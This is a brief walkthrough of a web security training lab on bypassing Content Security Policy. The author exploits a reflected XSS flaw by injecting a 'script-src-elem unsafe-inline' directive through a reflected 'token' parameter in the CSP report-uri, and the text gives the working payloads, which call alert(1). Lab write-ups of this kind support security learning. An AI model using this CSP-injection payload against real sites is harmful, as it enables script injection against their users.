LAB 30 - Reflected XSS protected by CSP, with CSP bypass

Initial instructions

This lab uses CSP and contains a reflected XSS vulnerability.

To solve the lab, perform a cross-site scripting attack that bypasses the CSP and calls the alert function.

Please note that the intended solution to this lab is only possible in Chrome.

First of all I started by entering a simple XSS payload in the search box.

<img src=1 onerror=alert(1)>

The payload is being reflected, but the CSP prevents the script from executing.

Lets open this request in BurpSuite and visualize its CSP.

Here we can see the response contains a Content-Security-Policy header, and the report-uri directive contains a parameter called token.

So with that we can inject our own CSP directives into the policy.

For that I built the following XSS payload.

<script>alert(1)</script>&token=;script-src-elem 'unsafe-inline'

And I injected it into the URL like the following screenshot.

Congratulations, you solved the lab!